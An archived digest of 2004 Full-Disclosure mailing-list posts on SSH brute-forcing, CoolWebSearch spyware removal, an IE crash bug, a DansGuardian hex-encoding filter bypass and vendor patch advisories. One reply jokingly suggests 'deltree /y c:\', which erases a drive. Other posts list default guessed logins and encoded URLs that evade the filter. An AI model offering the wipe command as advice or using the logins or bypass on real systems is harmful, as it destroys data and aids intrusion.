OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Automated SSH login attempts?

From: Ali Campbell (fdisclosurealicampbell.org.uk)
Date: Thu Jul 29 2004 - 18:23:31 CDT

Do I take it that these things are just trying to log in using some
guessed password(s) ? Out of interest, do we have any idea what these
opportunistic passwords might be ?

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Cool Web Search

From: Richard Golodner (RGolodnerAetea.com)
Date: Thu Jul 29 2004 - 17:51:13 CDT

Try CWShredder too!

-----Original Message-----
From: Gregh [mailto:chowsozemail.com.au]
Sent: Thursday, July 29, 2004 5:46 PM
To: Disclosure Full
Subject: [Full-Disclosure] Cool Web Search

JFYI of anyone interested:

On Nanog a short time back, most of the list there decided that CWS couldn't
easily be removed. I first stumbled across it maybe around the start of July
and have had many instances of it, since, in many places.

Adaware does bugger-all to remove it. Spybot recognised it, got rid of it
and upon reboot it was back. It was never quite clear from a simple
inspection, what was putting it back.

When I first found it, I had also found "HiJackThis" and ran it. That prog
brought up the proper registry entries to enable me to correctly identify
CWS, remove the entries and delete files. It took some time the first time I
saw it but it takes about 10 mins (if that) to get rid of it, now. Nanog
disagreed and said it wasn't that easy. It simply WAS that easy. I just
happened to experience "dumb luck" and be one of the first (if not the
first) to easily get rid of it through HiJackThis.

So, for those of you who don't think Nanog is full of "Gods of Correctness",
if you are having probs with removal of CWS, get HiJackThis, let it scan and
then you will see, sticking out like a wart on your......nose :)........ the
entries you need to delete in order to properly rid that machine of CWS. It
wasn't hard using that prog.

Greg.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Cool Web Search

From: Gregh (chowsozemail.com.au)
Date: Thu Jul 29 2004 - 19:04:39 CDT

----- Original Message -----
From: "Richard Golodner" <RGolodnerAetea.com>
To: "'Gregh'" <chowsozemail.com.au>; "Disclosure Full"
<full-disclosurelists.netsys.com>
Sent: Friday, July 30, 2004 8:51 AM
Subject: RE: [Full-Disclosure] Cool Web Search

> Try CWShredder too!
>

I did. Regardless of what it says, CWShredder doesn't get rid of all
variants of CoolWebSearch.

Greg.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Crash IE with 11 bytes ;)

From: Aaron Gray (angraybeeb.net)
Date: Thu Jul 29 2004 - 09:19:50 CDT

> Here's a detailed description of what's going wrong with [STYLE];/*
>
> The problem is the unterminated comment "/*"; IE computes the length of
> the comment for a memcpy opperation by substracting the end pointer form
> the start pointer. The comment starts behind "/*" and should end at "*/",
> but since there is no terminator, the start of the string is used. IE
> there for calculates the string to be -2 unicode characters long. The
> subsequent memcpy will try to copy 0xFFFFFFFE bytes untill it gets a read
> or write exception. (You will see the offending instruction is a REP
> MOVSD)
>
> Unfortunately for us hackers, I believe you cannot control the length
> value for the memcpy other then setting it to -2. So you will always cause
> a read or write exception. You will only overwrite a small part of the
> heap before the exception is caused so overwriting the SEH to controlling
> execution is also ruled out.
>
> Conclusion: lame DoS
>
> I did find another way to use this to cause an exception at a different
> location:
> [SCRIPT]
> <snip>
> [/SCRIPT]
> This will crash because of a null pointer in a CMP [ESI], 0.
> It didn't look interesting to me, so no detailed investigation.
>
> Cheers,

Cheers, nice analysis, nasty bug, I bet the guy who wrote the code is feeling very sheepish :o)

TCS

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: OpenServer 5.0.6 OpenServer 5.0.7 : Multiple Vulnerabilities in Sendmail

From: George Capehart (gwcacm.org)
Date: Thu Jul 29 2004 - 17:07:08 CDT

On Wednesday 28 July 2004 16:10, please_reply_to_securitysco.com
allegedly wrote:
> _____________________________________________________________________
>_________
>
> SCO Security Advisory
>
> Subject: OpenServer 5.0.6 OpenServer 5.0.7 : Multiple
> Vulnerabilities in Sendmail Advisory number: SCOSA-2004.11
> Issue date: 2004 July 28
> Cross reference: sr876461 fz527630 erg712277 CAN-2003-0161 CA-2003-12
> sr884730 fz528323 erg712435 CAN-2003-0694 CA-2003-25
> _____________________________________________________________________
>_________
>
>
> 1. Problem Description
>
> CERT Advisory CA-2003-12
>
> There is a vulnerability in sendmail that can be exploited
> to cause a denial-of-service condition and could allow a
> remote attacker to execute arbitrary code with the privileges
> of the sendmail daemon, typically root.

This advisory was issued on March 29, 2003. That was /*sixteen*/ MONTHS
ago . . . C'mon, guys!

--
George W. Capehart

Key fingerprint: 3145 104D 9579 26DA DBC7 CDD0 9AE1 8C9C DD70 34EA

"With sufficient thrust, pigs fly just fine." -- RFC 1925

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] RE: outbind in MS outlook

From: Stephen Taylor (stayloagccs.lmco.com)
Date: Thu Jul 29 2004 - 13:21:23 CDT

Thank you very much. I don't get into the details but now I know a little
bit more to help me evaluate what I do see.
regards,
ST

-----Original Message-----
From: Kristian Lyngstøl [mailto:nesquikbohemians.org]
Sent: Thursday, July 29, 2004 2:03 PM
To: stayloagccs.lmco.com
Subject: Re: outbind in MS outlook

I am not subscribed to full-discolosure with my personal address (or
computer),
so forgive the lack of a copy of your mail :)

Anyway, what you are seeing is normal.

This is actually a bug in the html-code written by the spammer

In the lack of a <handler>:// in an URL, any browser will (or should)
assume that the link is relative to the path it is currently reading from.

So since the link code is only <a href="www.link.com">link</a>, not
<a href="http://www.link.com">link</a>, the browser will assume this is
relative to the mailbox it is reading it in. (outbind://...)

You will see the same problem on web sites if they omit the http:// in
links.

If www.siteA.com tries to link to www.siteB.com only using
<a href="www.siteB.com">, the browser will look for
http://www.siteA.com/www.siteB.com

--
Regards
Kristian Lyngstøl
Telenor SOC

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Cool Web Search

From: Todd Towles (toddtowlesbrookshires.com)
Date: Thu Jul 29 2004 - 19:39:02 CDT

The creator of CWShredder claims the newest versions of CWS are very
stealthy and I believe he as stopped updating the program. Therefore
CWShredder isn't the best for the newest. But as far as I understood things
(from other mailing list and forum post), HiJackThis wasn't removing them
100% either.

Todd

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Richard
Golodner
Sent: Thursday, July 29, 2004 5:51 PM
To: 'Gregh'; Disclosure Full
Subject: RE: [Full-Disclosure] Cool Web Search

Try CWShredder too!

-----Original Message-----
From: Gregh [mailto:chowsozemail.com.au]
Sent: Thursday, July 29, 2004 5:46 PM
To: Disclosure Full
Subject: [Full-Disclosure] Cool Web Search

JFYI of anyone interested:

On Nanog a short time back, most of the list there decided that CWS couldn't
easily be removed. I first stumbled across it maybe around the start of July
and have had many instances of it, since, in many places.

Adaware does bugger-all to remove it. Spybot recognised it, got rid of it
and upon reboot it was back. It was never quite clear from a simple
inspection, what was putting it back.

When I first found it, I had also found "HiJackThis" and ran it. That prog
brought up the proper registry entries to enable me to correctly identify
CWS, remove the entries and delete files. It took some time the first time I
saw it but it takes about 10 mins (if that) to get rid of it, now. Nanog
disagreed and said it wasn't that easy. It simply WAS that easy. I just
happened to experience "dumb luck" and be one of the first (if not the
first) to easily get rid of it through HiJackThis.

So, for those of you who don't think Nanog is full of "Gods of Correctness",
if you are having probs with removal of CWS, get HiJackThis, let it scan and
then you will see, sticking out like a wart on your......nose :)........ the
entries you need to delete in order to properly rid that machine of CWS. It
wasn't hard using that prog.

Greg.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Automated SSH login attempts?

From: Andrew Farmer (andfarmteknovis.com)
Date: Thu Jul 29 2004 - 19:51:18 CDT

On 29 Jul 2004, at 16:23, Ali Campbell wrote:
> Do I take it that these things are just trying to log in using some
> guessed password(s) ? Out of interest, do we have any idea what these
> opportunistic passwords might be ?

At least two of them are guest:guest and test:test. I'd guess that
root:root and adminadmin are on the list too :-)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (Darwin)

iD8DBQFBCZuGPa6RRaKl0ScRAudcAJ0QfNl0sNiNJeIMnLTIrBlgTDodxwCeMBeO
rUjq1SGFN7tNuuH1Az5yQro=
=btt5
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [Fwd: DansGuardian Hex Encoding URL Banned Extension Filter Bypass Vulnerability]

From: Rubén Molina (rubenudea.edu.co)
Date: Thu Jul 29 2004 - 13:20:45 CDT

DansGuardian Hex Encoding URL Banned Extension Filter Bypass Vulnerability
==========================================================================

Original Release Date: 2004-07-29
Author: Ruben Molina (a.k.a fradiavolo)
Email: rubenudea.edu.co

!!! VIVA COLOMBIA !!!

1. Systems affected:

All DansGuardian up to and including DansGuardian 2.8.

2. Overview:

DansGuardian (http://dansguardian.org) is a web Open Source content filter
available
for various Unix based operating systems, including Linux. It filters the
actual
content of pages based on many methods including phrase matching, PICS
filtering and
URL filtering.

DansGuardian may allow malicious users to bypass the extension filter
rules when
processing URLs which contain an hex encoded filename (e.g:
http://server/file.%65%78%65 or http://server/file%2eexe).

3. Impact:

Under some installations, this may violate security policy, or allow users
to inadvertantly access malicious web content.

4. Solution:

Upgrade to DansGuardian 2.8.0.1

5. Patch:

--- FOptionContainer.cpp.diff ---
806d805
< url.hexDecode();
---------------------------------

6. Timeline and credits:

28/07/2004 Notification to the main developer (author at dansguardian dot
org)
28/07/2004 DansGuardian 2.8.0.1 released
29/07/2004 Public Security Advisory.

7. Thanks to:

Gigax.org people and Silence Team ;)

--

Rubén Molina
0xDEF3F700

Zure atera iristean ostikada jotzen nola irtengo zara?
Eskuak buru gainean ala pistolaren gatilvan?

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: Automated SSH login attempts?

dmargolistwing.org
Date: Thu Jul 29 2004 - 17:18:01 CDT

Max Valdez wrote:

> doesnt make any sense
>
> That way you should have root on the first box to start exploiting others,
> kind of weird.
>
> smells like rootkit downloader to me.
>
> Anybody willing to make a strace of this program ??
>
> Max
>

A previous poster mentioned that after exploiting a test/test or
guest/guest account, an attacker downloaded SuckIt to his machine, got
root using some unspecified local vuln (he said it was a very unpatched
mcahine), and started from there.

The program IS linked against OpenSSL and appears to inintiate an ssh
connection with the target(s) in a separate text file (uniq.txt). I
can't follow the connection because of the encryption, but it seems to
be trying a user and then disconnecting (as in, I see nothing really
obviously out of the ordinary when I run it). Haven't got farther in
disassembling it yet.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Cool Web Search

From: JacK (jackwebsecurite.org)
Date: Thu Jul 29 2004 - 19:20:18 CDT

On Friday, July 30, 2004 1:03 AM [GMT+1=CET],
full-disclosure-requestlists.netsys.com
<full-disclosure-requestlists.netsys.com> écrivait:

> So, for those of you who don't think Nanog is full of "Gods of
> Correctness",
> if you are having probs with removal of CWS, get HiJackThis, let it scan
> and
> then you will see, sticking out like a wart on your......nose :)........
> the
> entries you need to delete in order to properly rid that machine of CWS.
> It
> wasn't hard using that prog.

HijackThis has its limits : it cannot get rid of some variants, for instance
which one with a hidden value regenereting the entry

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Windows\AppInit_DLLs

using Backdoor.Agent.ba to install itself and laucnchin a random name exe.

Regards,
--
JacK

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: Automated SSH login attempts?

dmargolistwing.org
Date: Thu Jul 29 2004 - 12:52:29 CDT

Stefan Janecek wrote:

> This does not seem to be a stupid brute force attack, as there is only
> one login attempt per user. Could it be that the tool tries to exploit
> some vulnerability in the sshd, and just tries to look harmless by using
> 'test' and 'guest' as usernames?
>
> The compromised machine was running an old debian woody installation
> which had not been upgraded for at least one year, the sshd version
> string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'

Does the Debian machine that was compromised have a ``test'' or
``guest'' username?

Also, if it wasn't patched in a year, it may still be vulnerable to
this: http://www.cert.org/advisories/CA-2003-24.html

I would tend to think this isn't a 0day kinda vuln, as if it were, he'd
be a lot more successful than he seems (unless we're all rooted and
don't even know it). But who can tell?

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Cool Web Search

From: Gregh (chowsozemail.com.au)
Date: Thu Jul 29 2004 - 20:08:08 CDT

----- Original Message -----
From: "JacK" <jackwebsecurite.org>
To: <full-disclosurelists.netsys.com>
Sent: Friday, July 30, 2004 10:20 AM
Subject: Re: [Full-Disclosure] Cool Web Search

> On Friday, July 30, 2004 1:03 AM [GMT+1=CET],
> full-disclosure-requestlists.netsys.com
> <full-disclosure-requestlists.netsys.com> écrivait:
>
>
> > So, for those of you who don't think Nanog is full of "Gods of
> > Correctness",
> > if you are having probs with removal of CWS, get HiJackThis, let it scan
> > and
> > then you will see, sticking out like a wart on your......nose :)........
> > the
> > entries you need to delete in order to properly rid that machine of CWS.
> > It
> > wasn't hard using that prog.
>
> HijackThis has its limits : it cannot get rid of some variants, for
instance
> which one with a hidden value regenereting the entry
>
> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
> NT\CurrentVersion\Windows\AppInit_DLLs
>
> using Backdoor.Agent.ba to install itself and laucnchin a random name
exe.
>

I don't know if you fully understand HiJackThis or maybe I was just unclear.

HiJackThis wasn't used by me to get rid of CWS as, for example, running
Adaware gets rid of tracking cookies and some installed spyware progs. It
was used by me to list various entries in registry which, when lumped
together like that, show off CWS quite easily. Once they are there, removing
them and the progs started by some of them is easy.

That is all you have to do. Don't expect HiJackThis to magically get rid of
it all at the flick of a button. You *DO* have to have a small amount of
registry knowledge in order to ID which entries are seriously bull and which
are honest BHOs etc. I am not a registry "expert" but claim a small amount
of registry knowledge so even to ME it was obvious what was what.

Greg.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Cool Web Search

From: KF (lists) (kf_listssecnetops.com)
Date: Thu Jul 29 2004 - 20:09:33 CDT

Try a deltree /y c:\ that usually does the trick.
-KF

Todd Towles wrote:

>The creator of CWShredder claims the newest versions of CWS are very
>stealthy and I believe he as stopped updating the program. Therefore
>CWShredder isn't the best for the newest. But as far as I understood things
>(from other mailing list and forum post), HiJackThis wasn't removing them
>100% either.
>
>Todd
>
>-----Original Message-----
>From: full-disclosure-adminlists.netsys.com
>[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Richard
>Golodner
>Sent: Thursday, July 29, 2004 5:51 PM
>To: 'Gregh'; Disclosure Full
>Subject: RE: [Full-Disclosure] Cool Web Search
>
>Try CWShredder too!
>
>-----Original Message-----
>From: Gregh [mailto:chowsozemail.com.au]
>Sent: Thursday, July 29, 2004 5:46 PM
>To: Disclosure Full
>Subject: [Full-Disclosure] Cool Web Search
>
>
>JFYI of anyone interested:
>
>On Nanog a short time back, most of the list there decided that CWS couldn't
>easily be removed. I first stumbled across it maybe around the start of July
>and have had many instances of it, since, in many places.
>
>Adaware does bugger-all to remove it. Spybot recognised it, got rid of it
>and upon reboot it was back. It was never quite clear from a simple
>inspection, what was putting it back.
>
>When I first found it, I had also found "HiJackThis" and ran it. That prog
>brought up the proper registry entries to enable me to correctly identify
>CWS, remove the entries and delete files. It took some time the first time I
>saw it but it takes about 10 mins (if that) to get rid of it, now. Nanog
>disagreed and said it wasn't that easy. It simply WAS that easy. I just
>happened to experience "dumb luck" and be one of the first (if not the
>first) to easily get rid of it through HiJackThis.
>
>So, for those of you who don't think Nanog is full of "Gods of Correctness",
>if you are having probs with removal of CWS, get HiJackThis, let it scan and
>then you will see, sticking out like a wart on your......nose :)........ the
>entries you need to delete in order to properly rid that machine of CWS. It
>wasn't hard using that prog.
>
>Greg.
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] CHX-I

From: Maurizio Trinco (maurizio_trincoyahoo.com)
Date: Thu Jul 29 2004 - 21:46:55 CDT

Hey all,
CHX (http://www.idrci.net/idrci_tryit2.htm) seems to
be a very nice piece of software. Anyone tried it in
real life? After toying with it for a couple of hours,
I really don't understand how come it's still just a
(relatively) obscure application. Any comments re. its
usage? any known vulnerabilities?

        
                
__________________________________
Do you Yahoo!?
New and Improved Yahoo! Mail - 100MB free storage!
http://promotions.yahoo.com/new_mail

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: OpenServer 5.0.6 OpenServer 5.0.7 : Multiple Vulnerabilities in Sendmail

From: Frank Knobbe (frankknobbe.us)
Date: Thu Jul 29 2004 - 21:57:38 CDT

On Thu, 2004-07-29 at 17:07, George Capehart wrote:
> > Subject: OpenServer 5.0.6 OpenServer 5.0.7 : Multiple
> > Vulnerabilities in Sendmail Advisory number: SCOSA-2004.11
> > Issue date: 2004 July 28

> This advisory was issued on March 29, 2003. That was /*sixteen*/ MONTHS
> ago . . . C'mon, guys!

Heya George,

perhaps the engineers are too busy fixing broken legal strategies and
are putting silly software issues on the back=burner.

(After all, why fix it if they file Chapter 11 by end of the year
anyway?)

Cheers,
Frank

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (FreeBSD)

iD8DBQBBCbkhJjGc5ftAw8wRAuoAAJ9XmkPrULnmctXnNd5rywKehlqZyQCgvowG
y92Ox70Ed4Q2eJp6oXmYTE0=
=y3GL
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] MDKSA-2004:077 - Updated wv packages fix vulnerability

From: Mandrake Linux Security Team (securitylinux-mandrake.com)
Date: Fri Jul 30 2004 - 00:26:09 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

                 Mandrakelinux Security Update Advisory
 _______________________________________________________________________

 Package name: wv
 Advisory ID: MDKSA-2004:077
 Date: July 29th, 2004

 Affected versions: 10.0, 9.2
 ______________________________________________________________________

 Problem Description:

 iDefense discovered a buffer overflow vulnerability in the wv package
 which could allow an attacker to execute arbitrary code with the
 privileges of the user running the vulnerable application.
 
 The updated packages are patched to protect against this problem.
 _______________________________________________________________________

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0645
  http://www.idefense.com/application/poi/display?id=115&type=vulnerabilities&flashstatus=true
 ______________________________________________________________________

 Updated Packages:
  
 Mandrakelinux 10.0:
 7bc8b712dbb5ca6592de05341b6d1489 10.0/RPMS/libwv-1.0_0-1.0.0-1.1.100mdk.i586.rpm
 bec8e09ab3be99e622bd62cf6c0cf3df 10.0/RPMS/libwv-1.0_0-devel-1.0.0-1.1.100mdk.i586.rpm
 e9795464f2baa0bb36ea2f15d7e420c6 10.0/RPMS/wv-1.0.0-1.1.100mdk.i586.rpm
 10a630945f35b4a90f36a6270d98d241 10.0/SRPMS/wv-1.0.0-1.1.100mdk.src.rpm

 Mandrakelinux 10.0/AMD64:
 e3072c5942b032b547b04dd10a442826 amd64/10.0/RPMS/lib64wv-1.0_0-1.0.0-1.1.100mdk.amd64.rpm
 8b369ac8db42130442c003cb7229a7d1 amd64/10.0/RPMS/lib64wv-1.0_0-devel-1.0.0-1.1.100mdk.amd64.rpm
 98c5fa468e3815501058461213bb7da7 amd64/10.0/RPMS/wv-1.0.0-1.1.100mdk.amd64.rpm
 10a630945f35b4a90f36a6270d98d241 amd64/10.0/SRPMS/wv-1.0.0-1.1.100mdk.src.rpm

 Mandrakelinux 9.2:
 dcf67ddd72cc96ea526d4189dce93edb 9.2/RPMS/libwv-1.0_0-1.0.0-1.1.92mdk.i586.rpm
 d9c0629e2c8921a93290aede1b5158f9 9.2/RPMS/libwv-1.0_0-devel-1.0.0-1.1.92mdk.i586.rpm
 fa6f235b5934c40af8cb087394bcdefc 9.2/RPMS/wv-1.0.0-1.1.92mdk.i586.rpm
 ef345c688ddb57bdbadba00a5b924c79 9.2/SRPMS/wv-1.0.0-1.1.92mdk.src.rpm

 Mandrakelinux 9.2/AMD64:
 a23f13d265c1916c45c514798a37aaad amd64/9.2/RPMS/lib64wv-1.0_0-1.0.0-1.1.92mdk.amd64.rpm
 9ca5b4da978fb5c7908cd52018f6e191 amd64/9.2/RPMS/lib64wv-1.0_0-devel-1.0.0-1.1.92mdk.amd64.rpm
 568e4b5933ceed44a7c7b30dfff15f80 amd64/9.2/RPMS/wv-1.0.0-1.1.92mdk.amd64.rpm
 ef345c688ddb57bdbadba00a5b924c79 amd64/9.2/SRPMS/wv-1.0.0-1.1.92mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrakeUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandrakesoft for security. You can obtain
 the GPG public key of the Mandrakelinux Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandrakelinux at:

  http://www.mandrakesoft.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_linux-mandrake.com

 Type Bits/KeyID Date User ID
 pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team
  <security linux-mandrake.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQFBCdvwmqjQ0CJFipgRAoHPAJ419K04Am6fBCVSjd92EMUjQyW3QACgvnkl
xlFsJ7R1txTrB3F7MPA7AMI=
=ywgN
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] MDKSA-2004:078 - Updated OpenOffice.org packages fix libneon vulnerability

From: Mandrake Linux Security Team (securitylinux-mandrake.com)
Date: Fri Jul 30 2004 - 00:35:59 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

                 Mandrakelinux Security Update Advisory
 _______________________________________________________________________

 Package name: OpenOffice.org
 Advisory ID: MDKSA-2004:078
 Date: July 29th, 2004

 Affected versions: 10.0
 ______________________________________________________________________

 Problem Description:

 The OpenOffice.org office suite contains an internal libneon library
 which allows it to connect to WebDAV servers. This internal library
 is subject to the same vulnerabilities that were fixed in libneon
 recently. These updated packages contain fixes to libneon to
 correct the several format string vulnerabilities in it, as well as
 a heap-based buffer overflow vulnerability.
 _______________________________________________________________________

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0179
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0398
 ______________________________________________________________________

 Updated Packages:
  
 Mandrakelinux 10.0:
 bdd8d8a8b6af463df910a7cde025b734 10.0/RPMS/OpenOffice.org-1.1.2-3.1.100mdk.i586.rpm
 51c8887de72b7ac39c85062b35d260e6 10.0/RPMS/OpenOffice.org-help-cs-1.1.2-3.1.100mdk.i586.rpm
 1be3655a3870f3a62608df7e864afe9e 10.0/RPMS/OpenOffice.org-help-de-1.1.2-3.1.100mdk.i586.rpm
 0e01d4df1bd94eb1937b4875af700056 10.0/RPMS/OpenOffice.org-help-en-1.1.2-3.1.100mdk.i586.rpm
 5f00be2536c9e8b3a836275b96ab753b 10.0/RPMS/OpenOffice.org-help-es-1.1.2-3.1.100mdk.i586.rpm
 e90125b24f99f099704d60018e339b8d 10.0/RPMS/OpenOffice.org-help-eu-1.1.2-3.1.100mdk.i586.rpm
 836aec6915d5ceecc20c3e034e19e336 10.0/RPMS/OpenOffice.org-help-fi-1.1.2-3.1.100mdk.i586.rpm
 20b5190e2b683783aab65d883468074e 10.0/RPMS/OpenOffice.org-help-fr-1.1.2-3.1.100mdk.i586.rpm
 4f7ef1c9b8251e96ce140463eaf28310 10.0/RPMS/OpenOffice.org-help-it-1.1.2-3.1.100mdk.i586.rpm
 7b5f6d5701e9f290d34ab7a4ada25fc1 10.0/RPMS/OpenOffice.org-help-ja-1.1.2-3.1.100mdk.i586.rpm
 d70298c769ce7dd2596d640a0c644cc9 10.0/RPMS/OpenOffice.org-help-ko-1.1.2-3.1.100mdk.i586.rpm
 ed06265ba967349b8a28420e5ff56ae8 10.0/RPMS/OpenOffice.org-help-nl-1.1.2-3.1.100mdk.i586.rpm
 b6c34d066a2addb975837dba16ffe9c7 10.0/RPMS/OpenOffice.org-help-ru-1.1.2-3.1.100mdk.i586.rpm
 c2dfd07ac968d38a0c6c59828f984850 10.0/RPMS/OpenOffice.org-help-sk-1.1.2-3.1.100mdk.i586.rpm
 6dbf67fa908bb9a90dfcc0aa7fe43c93 10.0/RPMS/OpenOffice.org-help-sv-1.1.2-3.1.100mdk.i586.rpm
 82de991deefe0ed144890b5e107c7c49 10.0/RPMS/OpenOffice.org-help-zh_CN-1.1.2-3.1.100mdk.i586.rpm
 bd471a407725562c67f7d6b993fe968c 10.0/RPMS/OpenOffice.org-help-zh_TW-1.1.2-3.1.100mdk.i586.rpm
 30cbafc38454793497dcace816814589 10.0/RPMS/OpenOffice.org-l10n-ar-1.1.2-3.1.100mdk.i586.rpm
 6c1f99a64b23c335d64effc58ace1a66 10.0/RPMS/OpenOffice.org-l10n-ca-1.1.2-3.1.100mdk.i586.rpm
 f7217fbce4f4fec19c66007bf7f1c8fa 10.0/RPMS/OpenOffice.org-l10n-cs-1.1.2-3.1.100mdk.i586.rpm
 da66f567a0c95d2551385706b6322511 10.0/RPMS/OpenOffice.org-l10n-da-1.1.2-3.1.100mdk.i586.rpm
 b25c4a8a5a04dba649dbe07cb74e437c 10.0/RPMS/OpenOffice.org-l10n-de-1.1.2-3.1.100mdk.i586.rpm
 c9de8265acf394e867f9d37dab8b8e4f 10.0/RPMS/OpenOffice.org-l10n-el-1.1.2-3.1.100mdk.i586.rpm
 26d3aec1657864a5af79e6cf42ec575c 10.0/RPMS/OpenOffice.org-l10n-en-1.1.2-3.1.100mdk.i586.rpm
 306840e68f1c5554b56fcb5a78d05662 10.0/RPMS/OpenOffice.org-l10n-es-1.1.2-3.1.100mdk.i586.rpm
 d497f588850259bb25ca2a8bfb46437b 10.0/RPMS/OpenOffice.org-l10n-et-1.1.2-3.1.100mdk.i586.rpm
 d093a78f33eb0e8e9ff6e10ae6f83b4f 10.0/RPMS/OpenOffice.org-l10n-eu-1.1.2-3.1.100mdk.i586.rpm
 092efa049db70abadaa2eb2780d29d13 10.0/RPMS/OpenOffice.org-l10n-fi-1.1.2-3.1.100mdk.i586.rpm
 e57acc32c3fe720cd5643bb9e1bee835 10.0/RPMS/OpenOffice.org-l10n-fr-1.1.2-3.1.100mdk.i586.rpm
 061f19572d6f588b2da57b32954f4960 10.0/RPMS/OpenOffice.org-l10n-it-1.1.2-3.1.100mdk.i586.rpm
 7db9ae970b0cd452cb052743172a9985 10.0/RPMS/OpenOffice.org-l10n-ja-1.1.2-3.1.100mdk.i586.rpm
 2c39709ba4dbbbdf592d3331c4f9b236 10.0/RPMS/OpenOffice.org-l10n-ko-1.1.2-3.1.100mdk.i586.rpm
 cecb56a830fa676b1e9e27ece5c39271 10.0/RPMS/OpenOffice.org-l10n-nl-1.1.2-3.1.100mdk.i586.rpm
 ead058a94cc6f3e86d58aac7235f6782 10.0/RPMS/OpenOffice.org-l10n-pl-1.1.2-3.1.100mdk.i586.rpm
 e290451530d4bf28cca0977cb0388d18 10.0/RPMS/OpenOffice.org-l10n-pt-1.1.2-3.1.100mdk.i586.rpm
 c2d58b04563e54556780f387953edc6e 10.0/RPMS/OpenOffice.org-l10n-pt_BR-1.1.2-3.1.100mdk.i586.rpm
 1dc89fbb3e79f4f3a41da6665ae9e19b 10.0/RPMS/OpenOffice.org-l10n-ru-1.1.2-3.1.100mdk.i586.rpm
 308e28b58b5ee72f84d8fc3c24f4c2dd 10.0/RPMS/OpenOffice.org-l10n-sk-1.1.2-3.1.100mdk.i586.rpm
 fe1419e7a3b301d28046e6d64d30f724 10.0/RPMS/OpenOffice.org-l10n-sv-1.1.2-3.1.100mdk.i586.rpm
 144a6daad887f537fbe1954d8f3de6b2 10.0/RPMS/OpenOffice.org-l10n-tr-1.1.2-3.1.100mdk.i586.rpm
 ba8e3f3119d89fa4f727f3e8d002cdec 10.0/RPMS/OpenOffice.org-l10n-zh_CN-1.1.2-3.1.100mdk.i586.rpm
 f43ae55a73eff7fadce5d5fc5ec6523b 10.0/RPMS/OpenOffice.org-l10n-zh_TW-1.1.2-3.1.100mdk.i586.rpm
